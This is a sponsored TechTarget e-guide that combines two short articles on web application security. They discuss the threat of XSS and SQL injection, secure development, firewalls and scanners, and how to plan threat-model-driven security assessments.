security assessment of web facing applications

Web-facing Applications Security Assessment Tools and Strategies

of 9 Sponsored by

Web-facing Applications: Security Assessment Tools and Strategies

Contents

Web-facing Applications: Mitigating Likely Web Application Threats

How to Review Your Web Application Security Assessment Tools, Strategy

Businesses are constantly creating web applications that offer improved access to information. However, this online presence has opened the door to new information security threats, and web application security assessments often fall short in their results. Read this expert E-Guide to learn how you can properly assess web application threats and the tools your organization can use.

Web-facing Applications: Mitigating Likely Web Application Threats By: Nick Lewis, Enterprise Threats

Nearly all businesses now cultivate a presence online. They do so not only to

provide information, but also to interact with their customers via Web apps,

blogs and forums. From an online retailer's interactive baby registry, to an

electronic trading site's investment calculator, or a software vendor's

interactive support forums, on a daily basis enterprises are spawning new

Web applications that offer enhanced access to information.

This rapid rise of business-centric interactivity on the Web has, in turn,

brought forth new information security threats that were not previously

present in an organizations static webpages. These threats have been

targeted specifically at Web applications, including supplementary Web

servers, databases and other supporting infrastructure of an organization.

In this tip, we will examine the most urgent threats to Web-facing applications

today and how security teams can make them secure.

Urgent threats to Web-facing applications

There have been a number of recent reports from such vendors as Cenzic

Inc., Hewlett-Packard Co.(.pdf), Imperva Inc.(.pdf), Veracode Inc. (.pdf),

Whitehat Security Inc. (.pdf) and, most recently, Verizon, which assessed

numerous Web application threats facing enterprises today. The two most

common threats to Web applications from all of the reports were cross-site

of 9 Sponsored by


Contents



scripting (XSS) and SQL injection. Both of these threats have been around

years, but Web applications remain vulnerable to them.

Given the prevalence of these incidences and the abundance of tools

available for XSS and SQL attacks, organizations must significantly improve

Web application security before the risk of such attacks can be reduced.

New, less prevalent Web application threats have started to emerge, but

most attacks still exploit these most basic weaknesses.

Making Web applications more secure

There are a couple basic ways for security teams to make Web applications

more secure. This includes improving Web application development and

implementing new tools to help manage new information security risks to

Web applications. These methods complement each other and therefore

should not be used individually without other security controls in place.

Improving Web application development to improve the security of Web

applications should be part of any software or security development lifecycle.

There are many resources on software development lifecycles (SDLCs),

including Microsoft and general resources from DHS National Cyber Security

Division on building security into enterprise software development. Most

relevant to improving Web application security are the focused guides from

Open Web Application Security Project (OWASP), which include the

Development Guide 2010, which discusses secure Web application

development. As a part of an SDLC, users may want to include checks for

the most prevalent threats to Web applications and regularly update the

threat list. All of these tactics can be used to train developers on secure ways

to improve applications to ensure security bugs are minimized, found faster

and fixed faster.

Separately, the other important way to mitigate threats to Web-facing

applications is by implementing new tools to help manage Web application

security. These tools may not be new per se, but for many organizations,

products like Web application firewalls and Web application security

scanners have never been a consideration because they've either been able

of 9 Sponsored by


Contents



to avoid the compliance requirements that call for them, or because Web-

based threats were never a significant concern.

Yet these and other related emerging Web defense technologies can be

used to successfully block Web application-layer attacks and for scanning for

Web application vulnerabilities. Web application security scanners can be

included in your SDLC testing phase or as a standalone project to proactively

evaluate the security of your Web applications. Web application firewalls

inspect Web traffic for attacks on a Web application, often blocking the most

common attacks. To that point, Web application firewalls and Web

application security scanners will not block or detect all attacks or

vulnerabilities, so both tools will need to be constantly updated to detect new

threats.

These tools should extend on your existing controls in place, but you should

understand how the urgent threats bypass many of the traditional security

controls. For example, if you allow HTTP over port 80 through your firewall

to a Web server, your firewall does not typically evaluate if the network traffic

is legitimate HTTP traffic or if it includes potentially malicious SQL code used

for a SQL injection attack. A Web application firewall can inspect the HTTP

traffic and identify and many times block most SQL injection

attacks. Remember, no single security tool or control can protect all of an

enterprises Web applications, although the combination of Web application

firewalls and Web security scanning provides solid protection against the

most common XSS and SQL attacks.

Conclusion

New Web applications that allow organizations to interact with and improve

relationships with customers have brought new information security risks

from old static webpages. Traditional security controls have been largely

ineffective against the urgent Web application threats on their own, but

extending the traditional controls to include Web application security in

SDLCs and implementing new web application security tools will help reduce

the risk of these threats. Those that aren't using these technologies and don't

have plans to do so should carefully weigh the benefits that such applications

afford with the potential dangers of expanding their Web presence online.

of 9 Sponsored by


Contents



Securing today's Web-facing systems against these new threats has become

an essential priority for any enterprise information security program.

About the author:

Nick Lewis, CISSP, is an information security architect at Saint Louis

University. Nick received his Master of Science in Information Assurance

from Norwich University in 2005 and Telecommunications from Michigan

State University in 2002. Prior to joining Saint Louis University in 2011, Nick

worked at the University of Michigan and previous at Children's Hospital

Boston, the primary pediatric teaching hospital of Harvard Medical School, as

well as for Internet2 and Michigan State University.

How to Review Your Web Application Security Assessment Tools, Strategy By: Cory Scott, Contributor

Web application security assessments often fail to produce meaningful

results, leaving enterprise security teams scratching their heads about what

went wrong. Some are quick to blame the tools in use, others blame lack of

application security training and talent in the information security team, and

many cases, the assessment is treated like a checklist item that is given little

time, planning or forethought.

Web application security assessments need to get close enough to the

application to develop a threat model, look for common vulnerability patterns,

and customize their approach based on an evaluation of the technologies

rather than using a one-size-fits-all approach. In this tip, well explore each of

these points.

Does your Web application security assessment start by getting a grasp of

the business purpose and justification for why the application exists in the

first place? Unless you can clearly state what the application requirements

and expectations for performance are, you can't begin to assess it for

vulnerabilities. After all, what may seem like a broken function may actually

of 9 Sponsored by


Contents



be an intended feature; what appears to be sluggish performance may be

perfectly normal.

Don't let the application development team bury you in jargon or cryptic

acronyms; if you don't know what something means, ask. Developers often

forget that the Web application security assessment team is missing context

that has already been established within their group. Get out the whiteboard

and draw out the system as you understand it, and let them correct you or

add that context.

Once you have a good understanding of the application, build a quick threat

model. The following questions will help you to determine which

vulnerabilities have meaningful effects on the application.

Who is likely to attempt to abuse this application? Anonymous users

on the Internet? Your customers? Internal users?

Where is the trust boundary and what attack surface is exposed to

untrusted or semi-trusted users?

What assets are worth protecting? Common assets include the

integrity of the application's data, availability of the service, the

confidentiality of user or company data, or the underlying operating

system or network. Don't forget about client-side threats, where user

sessions and browser integrity can be targeted.

What incidents have taken place in the past and what concerns keep

the application team up at night?

What security requirements were important enough to be

documented, and more importantly, what requirements were

assumed or implied without being documented?

Web applications often share a set of "deadly features" that have a common

and frequent pattern of vulnerabilities that usually are platform-independent.

Things such as file download and upload, custom session management,

of 9 Sponsored by


Contents



authorization and access control, homegrown single sign-on, password

storage and reset mechanisms, email functionality and search functionality

often have critical flaws because of the subtle complexity required to

implement them safely. Make sure you identify these potential problem areas

when you assess an application, as they are likely to require careful

attention.

An assessment approach should be customized to the situation at hand. If

the application is a third-party product where source code is not available,

dynamic vulnerability analysis with tools may be the preferred approach, and

if the application has a high-risk posture, manual penetration testing may be

the logical next step.

Where source is available, work hand-in-hand with the development team to

use source code analysis tools to look for vulnerabilities. Don't just throw

Web application security assessment tools over the wall and ask developers

to run them. Get feedback on each tool's strengths, and invest time in

learning how to set tools up effectively to get sufficient coverage. Quickly

throw out classes of findings that are not relevant to your threat model or

prone to false positives when you first starting using static code analysis

tools to avoid fatigue.

When using dynamic analysis tools such as Web application vulnerability

scanners, make sure the tool "understands" your application as much as

possible, including where all the application endpoints are and what

functionality exists. Too many people rely exclusively on a tool's capabilities

to discover content and test it effectively without verifying the most sensitive

parts of the application are covered.

Manual penetration testing should be considered for high-risk applications,

sometimes in conjunction with code review or dynamic analysis. Leverage

your penetration testing resources to look for things that are difficult to

automate, such as threats targeted at data leakage, authentication and

authorization bypass, and cryptographic vulnerabilities.

of 9 Sponsored by


Contents



When putting this approach together, realize that organizational change

takes time. People that are used to steamrolling through the assessment

process may be hesitant at first to dedicate the necessary time to produce a

meaningful Web application security assessment. A step-wise approach that

shows the value for time spent incrementally will often break down some of

the defensive barriers.

About the author:

Cory Scott is a San Francisco-based director at Matasano Security, an

independent information security research and development firm.

of 9 Sponsored by


Contents



Free resources for technology professionals TechTarget publishes targeted technology media that address your need for

information and resources for researching products, developing strategy and

making cost-effective purchase decisions. Our network of technology-specific

Web sites gives you access to industry experts, independent content and

analysis and the Webs largest library of vendor-provided white papers,

webcasts, podcasts, videos, virtual trade shows, research reports and more

drawing on the rich R&D resources of technology providers to address

market trends, challenges and solutions. Our live events and virtual seminars

give you access to vendor neutral, expert commentary and advice on the

issues and challenges you face daily. Our social community IT Knowledge

Exchange allows you to share real world information in real time with peers

and experts.

What makes TechTarget unique? TechTarget is squarely focused on the enterprise IT space. Our team of

editors and network of industry experts provide the richest, most relevant

content to IT professionals and management. We leverage the immediacy of

the Web, the networking and face-to-face opportunities of events and virtual

events, and the ability to interact with peersall to create compelling and

actionable information for enterprise IT professionals across all industries

and markets.

Related TechTarget Websites

security assessment of web facing applications

Documents